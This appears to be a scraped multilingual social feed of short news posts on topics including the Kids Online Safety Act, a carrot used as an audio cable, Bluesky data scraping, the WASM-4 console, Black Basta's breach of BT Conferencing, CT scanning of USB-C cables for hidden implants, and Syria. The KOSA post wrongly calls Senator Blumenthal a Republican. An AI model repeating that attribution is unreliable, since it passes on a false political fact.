Sembra che gli sponsor scommettano sul fatto che il sostegno di Elon Musk potrebbe far pendere la bilancia verso il traguardo
"Guidati da X, i nuovi cambiamenti apportati al Kids Online Safety Act rafforzano il disegno di legge, salvaguardando al contempo la libertà di parola online e assicurando che non venga utilizzata per soffocare l'espressione", hanno affermato i senatori repubblicani Blumenthal e Blackburn in una dichiarazione congiunta
theverge.com/2024/12/7/2431552…
@Politica interna, europea e internazionale
X helps update Kids Online Safety Act in final push for passage in the Republican-led House
X helped make changes to the Kids Online Safety Act during a final push to pass the legislation before Congress adjourns, in an apparent bid to persuade Republican leaders.Lauren Feiner (The Verge)
like this
reshared this
The Audiophile Carrot
The widely quoted carrot factoid that the vegetable’s orange colour is the result of patriotic Dutch farmers breeding them that way may be an urban myth, but it’s certainly true that they can pass an audio signal in a time of need. [Julian Krause] follows up on a Reddit meme of a carrot being used to join two phono plugs, and appears to find the organic interconnect to be of good quality.
We had to admit a second look at a calendar to be sure that it’s not April 1st, but while his manner is slightly tongue in cheek it seems he’s really characterising the audio performance of a carrot. What he finds is a bit of attenuation, some bass cut, and an intrusion of RF interference pickup, but surprisingly, not a bad distortion figure.
Of course, we’re guessing the real point of the exercise is to poke fun at the world of excessive hi-fi equipment, something we’ve been only too glad to have a go at ourselves from time to time. But if the tests are to be taken at face value it seems that in a pinch, a carrot will do as a means to hook together line level audio cables, no doubt lending a sweet and crunchy overtone to the result. The video is below the break, for your entertainment.
youtube.com/embed/_bV1sfQQkZY?…
Ormai i tuoi post su Bluesky sono probabilmente in un mucchio di set di dati
Ora che è stato infranto il sigillo sull'estrazione dei post di Bluesky in set di dati per l'apprendimento automatico, le persone stanno prendendo in giro gli utenti e si stanno superando a vicenda creando set di dati sempre più grandi di post di Bluesky non resi anonimi e con testo completo, presi direttamente dal flusso pubblico della piattaforma di social media, tra cui uno che contiene quasi 300 milioni di post.
404media.co/bluesky-posts-mach…
Your Bluesky Posts Are Probably In A Bunch of Datasets Now
After a machine learning librarian released and then deleted a dataset of one million Bluesky posts, several other, even bigger datasets have appeared in its place—including one of almost 300 million non-anonymized posts.Samantha Cole (404 Media)
reshared this
Per rilanciare la Difesa europea 500 miliardi non bastano. Il punto di Nones
@Notizie dall'Italia e dal mondo
Secondo un articolo del Financial Times, a Bruxelles si starebbe valutando la creazione di un nuovo fondo per gli acquisti militari congiunti, dal valore di 500 miliardi euro. Il tema della difesa europea rimane centrale, ma il nuovo fondo rischia di non essere
Una riserva militare modulare e prontamente mobilitabile. Il progetto sulle Forze armate
@Notizie dall'Italia e dal mondo
Nel n. 111 dell’Osservatorio di Politica internazionale, intitolato “Una forza di riserva per l’Italia”, a cura di Matteo Mazziotti di Celso e del generale Francesco Diella, si affronta una riflessione, non più rimandabile, sulla costruzione di una riserva militare in grado di coniugare quantità e
WASM-4: Retro Game Dev Right in Your Browser
Have you ever dreamt of developing games that run on practically anything, from a modern browser to a microcontroller? Enter WASM-4, a minimalist fantasy console where constraints spark creativity. Unlike intimidating behemoths like Unity, WASM-4’s stripped-back specs challenge you to craft games within its 160×160 pixel display, four color palette, and 64 KB memory. Yes, you’ll curse at times, but as every tinkerer knows, limitations are the ultimate muse.
Born from the WebAssembly ecosystem, this console accepts “cartridges” in .wasm format. Any language that compiles to WebAssembly—be it Rust, Go, or AssemblyScript—can build games for it. The console’s emphasis on portability, with plans for microcontroller support, positions it as a playground for minimalist game developers. Multiplayer support? Check. Retro vibes? Double-check.
Entries from a 2022’s WASM-4 Game Jam showcase this quirky console’s charm. From pixel-perfect platformers to byte-sized RPGs, the creativity is staggering. One standout, “WasmAsteroids,” demonstrated real-time online multiplayer within these confines—proof that you don’t need sprawling engines to achieve cutting-edge design. This isn’t just about coding—it’s about coding smart. WASM-4 forces you to think like a retro engineer while indulging in modern convenience.
WASM-4 is a playground for anyone craving pure, unadulterated experimentation. Whether you’re a seasoned programmer or curious hobbyist, this console has the tools to spark something great.
Gazzetta del Cadavere reshared this.
Black Basta Colpisce BT Group: 500 GB di Dati Rubati e Pubblicati
Il colosso britannico delle telecomunicazioni BT Group ha dovuto affrontare un tentativo di attacco informatico contro una delle divisioni della sua vecchia struttura aziendale. Il gruppo di hacker Black Basta ha rivendicato l’incidente. Il gruppo ha pubblicato il nome dell’azienda sul proprio sito web, ma in realtà l’obiettivo dell’attacco era molto più modesto: la divisione BT Conferencing, con sede nel Massachusetts.
BT Group ha confermato che l’attacco ha preso di mira alcuni elementi della piattaforma BT Conferencing, che sono stati immediatamente rimossi e isolati. Secondo la società, i server interessati non influiscono sui servizi di conferenza BT, che rimangono pienamente operativi. Nessun altro servizio del gruppo o dato dei clienti è stato compromesso. Le indagini sull’incidente continuano in collaborazione con le autorità di regolamentazione e le forze dell’ordine.
Black Basta afferma di aver rubato circa 500 GB di dati, inclusi file finanziari, accordi di riservatezza, informazioni sugli utenti e altri documenti. Tra i campioni sul sito web del gruppo ci sono scansioni di carte d’identità, documenti di visto e informazioni sui bonus dei dipendenti. Tuttavia, la maggior parte del materiale sembra provenire dall’ultimo decennio.
Black Basta, che ha iniziato a operare come modello Ransomware-as-a-Service ( RaaS ) nell’aprile 2022, ha attaccato una serie di grandi obiettivi, tra cui la società di difesa tedesca Rheinmetall, la società svizzera di robotica ABB e la società britannica di outsourcing tecnologico Capita.
Secondo l’FBI e la CISA, gli affiliati di Black Basta hanno attaccato più di 500 organizzazioni tra aprile 2022 e maggio 2024 . Il gruppo ha inoltre crittografato e rubato dati da almeno 12 dei 16 settori infrastrutturali critici.
Dopo che il sindacato del crimine informatico Conti ha cessato le sue attività nel maggio 2022, si è diviso in diversi gruppi, uno dei quali si ritiene sia diventato Black Basta. Una ricerca condotta da Elliptic e Corvus Insurance mostra che il ransomware ha ricevuto almeno 100 milioni di dollari in riscatti da più di 90 vittime (a novembre 2023). Va notato che il gruppo ha attaccato almeno 20 vittime nelle prime 2 settimane di lavoro.
L'articolo Black Basta Colpisce BT Group: 500 GB di Dati Rubati e Pubblicati proviene da il blog della sicurezza informatica.
Gazzetta del Cadavere reshared this.
Il Cavo USB E’ sicuro? La Tomografia Computerizzata TC è il futuro nella Supply-chain
Esistono molte opzioni di cavi USB-C sul mercato, dai modelli economici che costano pochi dollari a quelli premium che costano oltre i 100. Il costo dipende dalla lunghezza, dalla qualità costruttiva, dal rispetto degli standard USB-C e dal marchio. Sebbene USB-C sia stato creato per semplificare la connessione dei dispositivi, si è rivelato uno standard abbastanza complesso che richiede la conoscenza delle sue funzionalità. Lo scopo principale di USB-C è combinare trasferimento dati, audio, video e ricarica in un unico cavo.
Tuttavia, le specifiche dei cavi USB-C variano notevolmente e la confezione spesso non fornisce informazioni complete sulle loro capacità. Inoltre, USB-C può comportare rischi per la sicurezza a causa dell’elettronica nascosta incorporata.
Anche se i cavi hanno un aspetto simile, la loro struttura interna può variare notevolmente. Gli esempi includono i cavi Thunderbolt 4 da 129 dollari di Apple, che utilizzano elettronica attiva complessa, e i semplici cavi Basics da 11,69 dollari di Amazon, che non utilizzano nemmeno tutti i pin del connettore USB-C. Attrezzature moderne come gli scanner industriali possono identificare le differenze di progettazione.
Di particolare interesse è il cavo O.MG, sviluppato per la ricerca sulla sicurezza. Sembra un normale cavo USB-C, ma al suo interno si nasconde un’elettronica in grado di intercettare dati, iniettare codice dannoso e persino registrare le sequenze di tasti. I metodi di test standard non sono sufficienti per rilevare tali minacce. Ad esempio, per identificare strutture di cavi complesse erano necessarie la scansione 3D e la visualizzazione dettagliata.
La questione della sicurezza del cavo USB-C sta diventando sempre più rilevante. I moderni metodi di verifica, come la scansione TC, sono già utilizzati per prevenire attacchi durante le fasi di produzione delle apparecchiature. Un esempio delle gravi conseguenze delle vulnerabilità nella catena di fornitura è il caso dell’utilizzo di dispositivi modificati in Libano che hanno attaccato gli Hezbollah.
Per gli utenti comuni il rischio rimane minimo, poiché i cavi specializzati come O.MG o EvilCrow Wind sono costosi e difficili da trovare. Tuttavia, per protezione, si consiglia di utilizzare cavi USB-C certificati ed evitare l’uso di porte di ricarica pubbliche.
Cos’è una sanzione TC
La scansione TC è un acronimo che si riferisce alla Tomografia Computerizzata (o TAC, Tomografia Assiale Computerizzata). È una tecnica di imaging avanzata che utilizza i raggi X per creare immagini tridimensionali dettagliate di un oggetto o un organismo, combinando una serie di immagini bidimensionali prese da diverse angolazioni.
Come Funziona
- Emissione di Raggi X: La macchina emette un fascio di raggi X che attraversa l’oggetto o il corpo.
- Raccolta dei Dati: I sensori rilevano l’intensità dei raggi X che emergono dall’altra parte, variando in base alla densità dei materiali attraversati.
- Elaborazione Computerizzata: Un computer elabora queste informazioni per generare immagini dettagliate in sezioni (slice) o in 3D.
Applicazioni della Scansione TC
- Medicina: È comunemente usata per diagnosticare malattie, traumi o anomalie interne.
- Industria e Sicurezza: Può essere utilizzata per analizzare la struttura interna di dispositivi e materiali senza danneggiarli, come nel caso dei cavi USB-C analizzati per scoprire elettronica nascosta o vulnerabilità.
- Ricerca sulla Sicurezza Informatica: Nel contesto citato, la scansione TC permette di rilevare componenti elettronici nascosti all’interno di cavi USB-C che sembrano normali, identificando eventuali minacce come microchip o trasmettitori.
È una tecnica molto utile per ispezioni non distruttive e per individuare dettagli che altrimenti non sarebbero visibili con metodi tradizionali.
L'articolo Il Cavo USB E’ sicuro? La Tomografia Computerizzata TC è il futuro nella Supply-chain proviene da il blog della sicurezza informatica.
SIRIA. Caduta Damasco, Bashar Assad è fuggito
@Notizie dall'Italia e dal mondo
I miliziani di Hay'at Tahrir al Sham e i loro alleati hanno annunciato dalla televisione pubblica di aver preso il potere
L'articolo SIRIA. Caduta Damasco, Bashar Assad è fuggito proviene da Pagine Esteri.